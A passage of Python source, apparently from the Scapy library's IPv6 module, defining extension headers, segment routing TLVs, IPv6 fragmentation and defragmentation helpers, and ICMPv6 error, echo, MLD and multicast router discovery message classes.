959 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

960 FieldLenField("len", None, length_of="options", fmt="B", 

961 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), 

962 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

963 _OptionsField("options", [], HBHOptUnknown, 2, 

964 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 

965 overload_fields = {IPv6: {"nh": 0}} 

966 

967 

968# Destination Option Header # 

969 

970class IPv6ExtHdrDestOpt(_IPv6ExtHdr): 

971 name = "IPv6 Extension Header - Destination Options Header" 

972 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

973 FieldLenField("len", None, length_of="options", fmt="B", 

974 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), 

975 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

976 _OptionsField("options", [], HBHOptUnknown, 2, 

977 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 

978 overload_fields = {IPv6: {"nh": 60}} 

979 

980 

981# Routing Header # 

982 

983class IPv6ExtHdrRouting(_IPv6ExtHdr): 

984 name = "IPv6 Option Header Routing" 

985 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

986 FieldLenField("len", None, count_of="addresses", fmt="B", 

987 adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501 

988 ByteField("type", 0), 

989 ByteField("segleft", None), 

990 BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501 

991 IP6ListField("addresses", [], 

992 length_from=lambda pkt: 8 * pkt.len)] 

993 overload_fields = {IPv6: {"nh": 43}} 

994 

995 def post_build(self, pkt, pay): 

996 if self.segleft is None: 

997 pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:] 

998 return _IPv6ExtHdr.post_build(self, pkt, pay) 

999 

1000 

1001# Segment Routing Header # 

1002 

1003# This implementation is based on RFC8754, but some older snippets come from: 

1004# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 

1005 

1006_segment_routing_header_tlvs = { 

1007 # RFC 8754 sect 8.2 

1008 0: "Pad1 TLV", 

1009 1: "Ingress Node TLV", # draft 06 

1010 2: "Egress Node TLV", # draft 06 

1011 4: "PadN TLV", 

1012 5: "HMAC TLV", 

1013} 

1014 

1015 

1016class IPv6ExtHdrSegmentRoutingTLV(Packet): 

1017 name = "IPv6 Option Header Segment Routing - Generic TLV" 

1018 # RFC 8754 sect 2.1 

1019 fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs), 

1020 ByteField("len", 0), 

1021 StrLenField("value", "", length_from=lambda pkt: pkt.len)] 

1022 

1023 def extract_padding(self, p): 

1024 return b"", p 

1025 

1026 registered_sr_tlv = {} 

1027 

1028 @classmethod 

1029 def register_variant(cls): 

1030 cls.registered_sr_tlv[cls.type.default] = cls 

1031 

1032 @classmethod 

1033 def dispatch_hook(cls, pkt=None, *args, **kargs): 

1034 if pkt: 

1035 tmp_type = ord(pkt[:1]) 

1036 return cls.registered_sr_tlv.get(tmp_type, cls) 

1037 return cls 

1038 

1039 

1040class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): 

1041 name = "IPv6 Option Header Segment Routing - Ingress Node TLV" 

1042 # draft-ietf-6man-segment-routing-header-06 3.1.1 

1043 fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs), 

1044 ByteField("len", 18), 

1045 ByteField("reserved", 0), 

1046 ByteField("flags", 0), 

1047 IP6Field("ingress_node", "::1")] 

1048 

1049 

1050class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): 

1051 name = "IPv6 Option Header Segment Routing - Egress Node TLV" 

1052 # draft-ietf-6man-segment-routing-header-06 3.1.2 

1053 fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs), 

1054 ByteField("len", 18), 

1055 ByteField("reserved", 0), 

1056 ByteField("flags", 0), 

1057 IP6Field("egress_node", "::1")] 

1058 

1059 

1060class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV): 

1061 name = "IPv6 Option Header Segment Routing - Pad1 TLV" 

1062 # RFC8754 sect 2.1.1.1, Pad1 is a single byte 

1063 fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs)] 

1064 

1065 

1066class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV): 

1067 name = "IPv6 Option Header Segment Routing - PadN TLV" 

1068 # RFC8754 sect 2.1.1.2 

1069 fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs), 

1070 FieldLenField("len", None, length_of="padding", fmt="B"), 

1071 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 

1072 

1073 

1074class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV): 

1075 name = "IPv6 Option Header Segment Routing - HMAC TLV" 

1076 # RFC8754 sect 2.1.2 

1077 fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs), 

1078 FieldLenField("len", None, length_of="hmac", 

1079 adjust=lambda _, x: x + 48), 

1080 BitField("D", 0, 1), 

1081 BitField("reserved", 0, 15), 

1082 IntField("hmackeyid", 0), 

1083 StrLenField("hmac", "", 

1084 length_from=lambda pkt: pkt.len - 48)] 

1085 

1086 

1087class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): 

1088 name = "IPv6 Option Header Segment Routing" 

1089 # RFC8754 sect 2. + flag bits from draft 06 

1090 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

1091 ByteField("len", None), 

1092 ByteField("type", 4), 

1093 ByteField("segleft", None), 

1094 ByteField("lastentry", None), 

1095 BitField("unused1", 0, 1), 

1096 BitField("protected", 0, 1), 

1097 BitField("oam", 0, 1), 

1098 BitField("alert", 0, 1), 

1099 BitField("hmac", 0, 1), 

1100 BitField("unused2", 0, 3), 

1101 ShortField("tag", 0), 

1102 IP6ListField("addresses", ["::1"], 

1103 count_from=lambda pkt: (pkt.lastentry + 1)), 

1104 PacketListField("tlv_objects", [], 

1105 IPv6ExtHdrSegmentRoutingTLV, 

1106 length_from=lambda pkt: 8 * pkt.len - 16 * ( 

1107 pkt.lastentry + 1 

1108 ))] 

1109 

1110 overload_fields = {IPv6: {"nh": 43}} 

1111 

1112 def post_build(self, pkt, pay): 

1113 

1114 if self.len is None: 

1115 

1116 # The extension must be align on 8 bytes 

1117 tmp_mod = (-len(pkt) + 8) % 8 

1118 if tmp_mod == 1: 

1119 tlv = IPv6ExtHdrSegmentRoutingTLVPad1() 

1120 pkt += raw(tlv) 

1121 elif tmp_mod >= 2: 

1122 # Add the padding extension 

1123 tmp_pad = b"\x00" * (tmp_mod - 2) 

1124 tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad) 

1125 pkt += raw(tlv) 

1126 

1127 tmp_len = (len(pkt) - 8) // 8 

1128 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:] 

1129 

1130 if self.segleft is None: 

1131 tmp_len = len(self.addresses) 

1132 if tmp_len: 

1133 tmp_len -= 1 

1134 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] 

1135 

1136 if self.lastentry is None: 

1137 lastentry = len(self.addresses) 

1138 if lastentry == 0: 

1139 warning( 

1140 "IPv6ExtHdrSegmentRouting(): the addresses list is empty!" 

1141 ) 

1142 else: 

1143 lastentry -= 1 

1144 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:] 

1145 

1146 return _IPv6ExtHdr.post_build(self, pkt, pay) 

1147 

1148 

1149# Fragmentation Header # 

1150 

1151class IPv6ExtHdrFragment(_IPv6ExtHdr): 

1152 name = "IPv6 Extension Header - Fragmentation header" 

1153 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

1154 BitField("res1", 0, 8), 

1155 BitField("offset", 0, 13), 

1156 BitField("res2", 0, 2), 

1157 BitField("m", 0, 1), 

1158 IntField("id", None)] 

1159 overload_fields = {IPv6: {"nh": 44}} 

1160 

1161 def guess_payload_class(self, p): 

1162 if self.offset > 0: 

1163 return Raw 

1164 else: 

1165 return super(IPv6ExtHdrFragment, self).guess_payload_class(p) 

1166 

1167 

1168def defragment6(packets): 

1169 """ 

1170 Performs defragmentation of a list of IPv6 packets. Packets are reordered. 

1171 Crap is dropped. What lacks is completed by 'X' characters. 

1172 """ 

1173 

1174 # Remove non fragments 

1175 lst = [x for x in packets if IPv6ExtHdrFragment in x] 

1176 if not lst: 

1177 return [] 

1178 

1179 id = lst[0][IPv6ExtHdrFragment].id 

1180 

1181 llen = len(lst) 

1182 lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id] 

1183 if len(lst) != llen: 

1184 warning("defragment6: some fragmented packets have been removed from list") # noqa: E501 

1185 

1186 # reorder fragments 

1187 res = [] 

1188 while lst: 

1189 min_pos = 0 

1190 min_offset = lst[0][IPv6ExtHdrFragment].offset 

1191 for p in lst: 

1192 cur_offset = p[IPv6ExtHdrFragment].offset 

1193 if cur_offset < min_offset: 

1194 min_pos = 0 

1195 min_offset = cur_offset 

1196 res.append(lst[min_pos]) 

1197 del lst[min_pos] 

1198 

1199 # regenerate the fragmentable part 

1200 fragmentable = b"" 

1201 frag_hdr_len = 8 

1202 for p in res: 

1203 q = p[IPv6ExtHdrFragment] 

1204 offset = 8 * q.offset 

1205 if offset != len(fragmentable): 

1206 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501 

1207 frag_data_len = p[IPv6].plen 

1208 if frag_data_len is not None: 

1209 frag_data_len -= frag_hdr_len 

1210 fragmentable += b"X" * (offset - len(fragmentable)) 

1211 fragmentable += raw(q.payload)[:frag_data_len] 

1212 

1213 # Regenerate the unfragmentable part. 

1214 q = res[0].copy() 

1215 nh = q[IPv6ExtHdrFragment].nh 

1216 q[IPv6ExtHdrFragment].underlayer.nh = nh 

1217 q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) 

1218 del q[IPv6ExtHdrFragment].underlayer.payload 

1219 q /= conf.raw_layer(load=fragmentable) 

1220 del q.plen 

1221 

1222 if q[IPv6].underlayer: 

1223 q[IPv6] = IPv6(raw(q[IPv6])) 

1224 else: 

1225 q = IPv6(raw(q)) 

1226 return q 

1227 

1228 

1229def fragment6(pkt, fragSize): 

1230 """ 

1231 Performs fragmentation of an IPv6 packet. 'fragSize' argument is the 

1232 expected maximum size of fragment data (MTU). The list of packets is 

1233 returned. 

1234 

1235 If packet does not contain an IPv6ExtHdrFragment class, it is added to 

1236 first IPv6 layer found. If no IPv6 layer exists packet is returned in 

1237 result list unmodified. 

1238 """ 

1239 

1240 pkt = pkt.copy() 

1241 

1242 if IPv6ExtHdrFragment not in pkt: 

1243 if IPv6 not in pkt: 

1244 return [pkt] 

1245 

1246 layer3 = pkt[IPv6] 

1247 data = layer3.payload 

1248 frag = IPv6ExtHdrFragment(nh=layer3.nh) 

1249 

1250 layer3.remove_payload() 

1251 del layer3.nh 

1252 del layer3.plen 

1253 

1254 frag.add_payload(data) 

1255 layer3.add_payload(frag) 

1256 

1257 # If the payload is bigger than 65535, a Jumbo payload must be used, as 

1258 # an IPv6 packet can't be bigger than 65535 bytes. 

1259 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: 

1260 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501 

1261 return [] 

1262 

1263 s = raw(pkt) # for instantiation to get upper layer checksum right 

1264 

1265 if len(s) <= fragSize: 

1266 return [pkt] 

1267 

1268 # Fragmentable part : fake IPv6 for Fragmentable part length computation 

1269 fragPart = pkt[IPv6ExtHdrFragment].payload 

1270 tmp = raw(IPv6(src="::1", dst="::1") / fragPart) 

1271 fragPartLen = len(tmp) - 40 # basic IPv6 header length 

1272 fragPartStr = s[-fragPartLen:] 

1273 

1274 # Grab Next Header for use in Fragment Header 

1275 nh = pkt[IPv6ExtHdrFragment].nh 

1276 

1277 # Keep fragment header 

1278 fragHeader = pkt[IPv6ExtHdrFragment] 

1279 del fragHeader.payload # detach payload 

1280 

1281 # Unfragmentable Part 

1282 unfragPartLen = len(s) - fragPartLen - 8 

1283 unfragPart = pkt 

1284 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload 

1285 

1286 # Cut the fragmentable part to fit fragSize. Inner fragments have 

1287 # a length that is an integer multiple of 8 octets. last Frag MTU 

1288 # can be anything below MTU 

1289 lastFragSize = fragSize - unfragPartLen - 8 

1290 innerFragSize = lastFragSize - (lastFragSize % 8) 

1291 

1292 if lastFragSize <= 0 or innerFragSize == 0: 

1293 warning("Provided fragment size value is too low. " + 

1294 "Should be more than %d" % (unfragPartLen + 8)) 

1295 return [unfragPart / fragHeader / fragPart] 

1296 

1297 remain = fragPartStr 

1298 res = [] 

1299 fragOffset = 0 # offset, incremeted during creation 

1300 fragId = random.randint(0, 0xffffffff) # random id ... 

1301 if fragHeader.id is not None: # ... except id provided by user 

1302 fragId = fragHeader.id 

1303 fragHeader.m = 1 

1304 fragHeader.id = fragId 

1305 fragHeader.nh = nh 

1306 

1307 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... 

1308 while True: 

1309 if (len(remain) > lastFragSize): 

1310 tmp = remain[:innerFragSize] 

1311 remain = remain[innerFragSize:] 

1312 fragHeader.offset = fragOffset # update offset 

1313 fragOffset += (innerFragSize // 8) # compute new one 

1314 if IPv6 in unfragPart: 

1315 unfragPart[IPv6].plen = None 

1316 tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp) 

1317 res.append(tempo) 

1318 else: 

1319 fragHeader.offset = fragOffset # update offSet 

1320 fragHeader.m = 0 

1321 if IPv6 in unfragPart: 

1322 unfragPart[IPv6].plen = None 

1323 tempo = unfragPart / fragHeader / conf.raw_layer(load=remain) 

1324 res.append(tempo) 

1325 break 

1326 return res 

1327 

1328 

1329############################################################################# 

1330############################################################################# 

1331# ICMPv6* Classes # 

1332############################################################################# 

1333############################################################################# 

1334 

1335 

1336icmp6typescls = {1: "ICMPv6DestUnreach", 

1337 2: "ICMPv6PacketTooBig", 

1338 3: "ICMPv6TimeExceeded", 

1339 4: "ICMPv6ParamProblem", 

1340 128: "ICMPv6EchoRequest", 

1341 129: "ICMPv6EchoReply", 

1342 130: "ICMPv6MLQuery", # MLDv1 or MLDv2 

1343 131: "ICMPv6MLReport", 

1344 132: "ICMPv6MLDone", 

1345 133: "ICMPv6ND_RS", 

1346 134: "ICMPv6ND_RA", 

1347 135: "ICMPv6ND_NS", 

1348 136: "ICMPv6ND_NA", 

1349 137: "ICMPv6ND_Redirect", 

1350 # 138: Do Me - RFC 2894 - Seems painful 

1351 139: "ICMPv6NIQuery", 

1352 140: "ICMPv6NIReply", 

1353 141: "ICMPv6ND_INDSol", 

1354 142: "ICMPv6ND_INDAdv", 

1355 143: "ICMPv6MLReport2", 

1356 144: "ICMPv6HAADRequest", 

1357 145: "ICMPv6HAADReply", 

1358 146: "ICMPv6MPSol", 

1359 147: "ICMPv6MPAdv", 

1360 # 148: Do Me - SEND related - RFC 3971 

1361 # 149: Do Me - SEND related - RFC 3971 

1362 151: "ICMPv6MRD_Advertisement", 

1363 152: "ICMPv6MRD_Solicitation", 

1364 153: "ICMPv6MRD_Termination", 

1365 # 154: Do Me - FMIPv6 Messages - RFC 5568 

1366 155: "ICMPv6RPL", # RFC 6550 

1367 } 

1368 

1369icmp6typesminhdrlen = {1: 8, 

1370 2: 8, 

1371 3: 8, 

1372 4: 8, 

1373 128: 8, 

1374 129: 8, 

1375 130: 24, 

1376 131: 24, 

1377 132: 24, 

1378 133: 8, 

1379 134: 16, 

1380 135: 24, 

1381 136: 24, 

1382 137: 40, 

1383 # 139: 

1384 # 140 

1385 141: 8, 

1386 142: 8, 

1387 143: 8, 

1388 144: 8, 

1389 145: 8, 

1390 146: 8, 

1391 147: 8, 

1392 151: 8, 

1393 152: 4, 

1394 153: 4, 

1395 155: 4 

1396 } 

1397 

1398icmp6types = {1: "Destination unreachable", 

1399 2: "Packet too big", 

1400 3: "Time exceeded", 

1401 4: "Parameter problem", 

1402 100: "Private Experimentation", 

1403 101: "Private Experimentation", 

1404 128: "Echo Request", 

1405 129: "Echo Reply", 

1406 130: "MLD Query", 

1407 131: "MLD Report", 

1408 132: "MLD Done", 

1409 133: "Router Solicitation", 

1410 134: "Router Advertisement", 

1411 135: "Neighbor Solicitation", 

1412 136: "Neighbor Advertisement", 

1413 137: "Redirect Message", 

1414 138: "Router Renumbering", 

1415 139: "ICMP Node Information Query", 

1416 140: "ICMP Node Information Response", 

1417 141: "Inverse Neighbor Discovery Solicitation Message", 

1418 142: "Inverse Neighbor Discovery Advertisement Message", 

1419 143: "MLD Report Version 2", 

1420 144: "Home Agent Address Discovery Request Message", 

1421 145: "Home Agent Address Discovery Reply Message", 

1422 146: "Mobile Prefix Solicitation", 

1423 147: "Mobile Prefix Advertisement", 

1424 148: "Certification Path Solicitation", 

1425 149: "Certification Path Advertisement", 

1426 151: "Multicast Router Advertisement", 

1427 152: "Multicast Router Solicitation", 

1428 153: "Multicast Router Termination", 

1429 155: "RPL Control Message", 

1430 200: "Private Experimentation", 

1431 201: "Private Experimentation"} 

1432 

1433 

1434class _ICMPv6(Packet): 

1435 name = "ICMPv6 dummy class" 

1436 overload_fields = {IPv6: {"nh": 58}} 

1437 

1438 def post_build(self, p, pay): 

1439 p += pay 

1440 if self.cksum is None: 

1441 chksum = in6_chksum(58, self.underlayer, p) 

1442 p = p[:2] + struct.pack("!H", chksum) + p[4:] 

1443 return p 

1444 

1445 def hashret(self): 

1446 return self.payload.hashret() 

1447 

1448 def answers(self, other): 

1449 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... 

1450 if (isinstance(self.underlayer, IPerror6) or 

1451 isinstance(self.underlayer, _IPv6ExtHdr) and 

1452 isinstance(other, _ICMPv6)): 

1453 if not ((self.type == other.type) and 

1454 (self.code == other.code)): 

1455 return 0 

1456 return 1 

1457 return 0 

1458 

1459 

1460class _ICMPv6Error(_ICMPv6): 

1461 name = "ICMPv6 errors dummy class" 

1462 

1463 def guess_payload_class(self, p): 

1464 return IPerror6 

1465 

1466 

1467class ICMPv6Unknown(_ICMPv6): 

1468 name = "Scapy6 ICMPv6 fallback class" 

1469 fields_desc = [ByteEnumField("type", 1, icmp6types), 

1470 ByteField("code", 0), 

1471 XShortField("cksum", None), 

1472 StrField("msgbody", "")] 

1473 

1474 

1475# RFC 2460 # 

1476 

1477class ICMPv6DestUnreach(_ICMPv6Error): 

1478 name = "ICMPv6 Destination Unreachable" 

1479 fields_desc = [ByteEnumField("type", 1, icmp6types), 

1480 ByteEnumField("code", 0, {0: "No route to destination", 

1481 1: "Communication with destination administratively prohibited", # noqa: E501 

1482 2: "Beyond scope of source address", # noqa: E501 

1483 3: "Address unreachable", 

1484 4: "Port unreachable"}), 

1485 XShortField("cksum", None), 

1486 ByteField("length", 0), 

1487 X3BytesField("unused", 0), 

1488 _ICMPExtensionPadField(), 

1489 _ICMPExtensionField()] 

1490 post_dissection = _ICMP_extpad_post_dissection 

1491 

1492 

1493class ICMPv6PacketTooBig(_ICMPv6Error): 

1494 name = "ICMPv6 Packet Too Big" 

1495 fields_desc = [ByteEnumField("type", 2, icmp6types), 

1496 ByteField("code", 0), 

1497 XShortField("cksum", None), 

1498 IntField("mtu", 1280)] 

1499 

1500 

1501class ICMPv6TimeExceeded(_ICMPv6Error): 

1502 name = "ICMPv6 Time Exceeded" 

1503 fields_desc = [ByteEnumField("type", 3, icmp6types), 

1504 ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501 

1505 1: "fragment reassembly time exceeded"}), # noqa: E501 

1506 XShortField("cksum", None), 

1507 ByteField("length", 0), 

1508 X3BytesField("unused", 0), 

1509 _ICMPExtensionPadField(), 

1510 _ICMPExtensionField()] 

1511 post_dissection = _ICMP_extpad_post_dissection 

1512 

1513 

1514# The default pointer value is set to the next header field of 

1515# the encapsulated IPv6 packet 

1516 

1517 

1518class ICMPv6ParamProblem(_ICMPv6Error): 

1519 name = "ICMPv6 Parameter Problem" 

1520 fields_desc = [ByteEnumField("type", 4, icmp6types), 

1521 ByteEnumField( 

1522 "code", 0, 

1523 {0: "erroneous header field encountered", 

1524 1: "unrecognized Next Header type encountered", 

1525 2: "unrecognized IPv6 option encountered", 

1526 3: "first fragment has incomplete header chain"}), 

1527 XShortField("cksum", None), 

1528 IntField("ptr", 6)] 

1529 

1530 

1531class ICMPv6EchoRequest(_ICMPv6): 

1532 name = "ICMPv6 Echo Request" 

1533 fields_desc = [ByteEnumField("type", 128, icmp6types), 

1534 ByteField("code", 0), 

1535 XShortField("cksum", None), 

1536 XShortField("id", 0), 

1537 XShortField("seq", 0), 

1538 StrField("data", "")] 

1539 

1540 def mysummary(self): 

1541 return self.sprintf("%name% (id: %id% seq: %seq%)") 

1542 

1543 def hashret(self): 

1544 return struct.pack("HH", self.id, self.seq) + self.payload.hashret() 

1545 

1546 

1547class ICMPv6EchoReply(ICMPv6EchoRequest): 

1548 name = "ICMPv6 Echo Reply" 

1549 type = 129 

1550 

1551 def answers(self, other): 

1552 # We could match data content between request and reply. 

1553 return (isinstance(other, ICMPv6EchoRequest) and 

1554 self.id == other.id and self.seq == other.seq and 

1555 self.data == other.data) 

1556 

1557 

1558# ICMPv6 Multicast Listener Discovery (RFC2710) # 

1559 

1560# tous les messages MLD sont emis avec une adresse source lien-locale 

1561# -> Y veiller dans le post_build si aucune n'est specifiee 

1562# La valeur de Hop-Limit doit etre de 1 

1563# "and an IPv6 Router Alert option in a Hop-by-Hop Options 

1564# header. (The router alert option is necessary to cause routers to 

1565# examine MLD messages sent to multicast addresses in which the router 

1566# itself has no interest" 

1567class _ICMPv6ML(_ICMPv6): 

1568 fields_desc = [ByteEnumField("type", 130, icmp6types), 

1569 ByteField("code", 0), 

1570 XShortField("cksum", None), 

1571 ShortField("mrd", 0), 

1572 ShortField("reserved", 0), 

1573 IP6Field("mladdr", "::")] 

1574 

1575# general queries are sent to the link-scope all-nodes multicast 

1576# address ff02::1, with a multicast address field of 0 and a MRD of 

1577# [Query Response Interval] 

1578# Default value for mladdr is set to 0 for a General Query, and 

1579# overloaded by the user for a Multicast Address specific query 

1580# TODO : See what we can do to automatically include a Router Alert 

1581# Option in a Destination Option Header. 

1582 

1583 

1584class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710 

1585 name = "MLD - Multicast Listener Query" 

1586 type = 130 

1587 mrd = 10000 # 10s for mrd 

1588 mladdr = "::" 

1589 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 

1590 

1591 

1592# TODO : See what we can do to automatically include a Router Alert 

1593# Option in a Destination Option Header. 

1594class ICMPv6MLReport(_ICMPv6ML): # RFC 2710 

1595 name = "MLD - Multicast Listener Report" 

1596 type = 131 

1597 overload_fields = {IPv6: {"hlim": 1, "nh": 58}} 

1598 

1599 def answers(self, query): 

1600 """Check the query type""" 

1601 return ICMPv6MLQuery in query 

1602 

1603# When a node ceases to listen to a multicast address on an interface, 

1604# it SHOULD send a single Done message to the link-scope all-routers 

1605# multicast address (FF02::2), carrying in its multicast address field 

1606# the address to which it is ceasing to listen 

1607# TODO : See what we can do to automatically include a Router Alert 

1608# Option in a Destination Option Header. 

1609 

1610 

1611class ICMPv6MLDone(_ICMPv6ML): # RFC 2710 

1612 name = "MLD - Multicast Listener Done" 

1613 type = 132 

1614 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}} 

1615 

1616 

1617# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) # 

1618 

1619class ICMPv6MLQuery2(_ICMPv6): # RFC 3810 

1620 name = "MLDv2 - Multicast Listener Query" 

1621 fields_desc = [ByteEnumField("type", 130, icmp6types), 

1622 ByteField("code", 0), 

1623 XShortField("cksum", None), 

1624 ShortField("mrd", 10000), 

1625 ShortField("reserved", 0), 

1626 IP6Field("mladdr", "::"), 

1627 BitField("Resv", 0, 4), 

1628 BitField("S", 0, 1), 

1629 BitField("QRV", 0, 3), 

1630 ByteField("QQIC", 0), 

1631 ShortField("sources_number", None), 

1632 IP6ListField("sources", [], 

1633 count_from=lambda pkt: pkt.sources_number)] 

1634 

1635 # RFC8810 - 4. Message Formats 

1636 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 

1637 

1638 def post_build(self, packet, payload): 

1639 """Compute the 'sources_number' field when needed""" 

1640 if self.sources_number is None: 

1641 srcnum = struct.pack("!H", len(self.sources)) 

1642 packet = packet[:26] + srcnum + packet[28:] 

1643 return _ICMPv6.post_build(self, packet, payload) 

1644 

1645 

1646class ICMPv6MLDMultAddrRec(Packet): 

1647 name = "ICMPv6 MLDv2 - Multicast Address Record" 

1648 fields_desc = [ByteField("rtype", 4), 

1649 FieldLenField("auxdata_len", None, 

1650 length_of="auxdata", 

1651 fmt="B"), 

1652 FieldLenField("sources_number", None, 

1653 length_of="sources", 

1654 adjust=lambda p, num: num // 16), 

1655 IP6Field("dst", "::"), 

1656 IP6ListField("sources", [], 

1657 length_from=lambda p: 16 * p.sources_number), 

1658 StrLenField("auxdata", "", 

1659 length_from=lambda p: p.auxdata_len)] 

1660 

1661 def default_payload_class(self, packet): 

1662 """Multicast Address Record followed by another one""" 

1663 return self.__class__ 

1664 

1665 

1666class ICMPv6MLReport2(_ICMPv6): # RFC 3810 

1667 name = "MLDv2 - Multicast Listener Report" 

1668 fields_desc = [ByteEnumField("type", 143, icmp6types), 

1669 ByteField("res", 0), 

1670 XShortField("cksum", None), 

1671 ShortField("reserved", 0), 

1672 ShortField("records_number", None), 

1673 PacketListField("records", [], 

1674 ICMPv6MLDMultAddrRec, 

1675 count_from=lambda p: p.records_number)] 

1676 

1677 # RFC8810 - 4. Message Formats 

1678 overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}} 

1679 

1680 def post_build(self, packet, payload): 

1681 """Compute the 'records_number' field when needed""" 

1682 if self.records_number is None: 

1683 recnum = struct.pack("!H", len(self.records)) 

1684 packet = packet[:6] + recnum + packet[8:] 

1685 return _ICMPv6.post_build(self, packet, payload) 

1686 

1687 def answers(self, query): 

1688 """Check the query type""" 

1689 return isinstance(query, ICMPv6MLQuery2) 

1690 

1691 

1692# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) # 

1693 

1694# TODO: 

1695# - 04/09/06 troglocan : find a way to automatically add a router alert 

1696# option for all MRD packets. This could be done in a specific 

1697# way when IPv6 is the under layer with some specific keyword 

1698# like 'exthdr'. This would allow to keep compatibility with 

1699# providing IPv6 fields to be overloaded in fields_desc. 

1700# 

1701# At the moment, if user inserts an IPv6 Router alert option 

1702# none of the IPv6 default values of IPv6 layer will be set. 

1703 

1704class ICMPv6MRD_Advertisement(_ICMPv6): 

1705 name = "ICMPv6 Multicast Router Discovery Advertisement" 

1706 fields_desc = [ByteEnumField("type", 151, icmp6types), 

1707 ByteField("advinter", 20), 

1708 XShortField("cksum", None), 

1709 ShortField("queryint", 0), 

1710 ShortField("robustness", 0)] 

1711 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 

1712 # IPv6 Router Alert requires manual inclusion 

1713 

1714 def extract_padding(self, s): 

1715 return s[:8], s[8:] 

1716 

1717 

1718class ICMPv6MRD_Solicitation(_ICMPv6): 

1719 name = "ICMPv6 Multicast Router Discovery Solicitation" 

1720 fields_desc = [ByteEnumField("type", 152, icmp6types), 

1721 ByteField("res", 0), 

1722 XShortField("cksum", None)] 

1723 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 

1724 # IPv6 Router Alert requires manual inclusion 

1725 

1726 def extract_padding(self, s): 

1727 return s[:4], s[4:] 

1728 

1729 

1730class ICMPv6MRD_Termination(_ICMPv6): 

1731 name = "ICMPv6 Multicast Router Discovery Termination" 

1732 fields_desc = [ByteEnumField("type", 153, icmp6types), 

1733 ByteField("res", 0), 

1734 XShortField("cksum", None)] 

1735 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}} 

1736 # IPv6 Router Alert requires manual inclusion 

1737 

1738 def extract_padding(self, s): 

1739 return s[:4], s[4:] 

1740 

1741 

1742# ICMPv6 Neighbor Discovery (RFC 2461) # 

1743 

1744icmp6ndopts = {1: "Source Link-Layer Address", 

1745 2: "Target Link-Layer Address", 

1746 3: "Prefix Information", 

1747 4: "Redirected Header", 

1748 5: "MTU", 

1749 6: "NBMA Shortcut Limit Option", # RFC2491 

1750 7: "Advertisement Interval Option", 

1751 8: "Home Agent Information Option", 

1752 9: "Source Address List", 

1753 10: "Target Address List", 

1754 11: "CGA Option", # RFC 3971 

1755 12: "RSA Signature Option", # RFC 3971 

1756 13: "Timestamp Option", # RFC 3971 

1757 14: "Nonce option", # RFC 3971 

1758 15: "Trust Anchor Option", # RFC 3971 

1759 16: "Certificate Option", # RFC 3971 

1760 17: "IP Address Option", # RFC 4068 

1761 18: "New Router Prefix Information Option", # RFC 4068 

1762 19: "Link-layer Address Option", # RFC 4068 

1763 20: "Neighbor Advertisement Acknowledgement Option", 

1764 21: "CARD Request Option", # RFC 4065/4066/4067 

1765 22: "CARD Reply Option", # RFC 4065/4066/4067 

1766 23: "MAP Option", # RFC 4140 

1767 24: "Route Information Option", # RFC 4191 

1768 25: "Recursive DNS Server Option", 

1769 26: "IPv6 Router Advertisement Flags Option" 

1770 } 

1771 

1772icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr", 

1773 2: "ICMPv6NDOptDstLLAddr", 

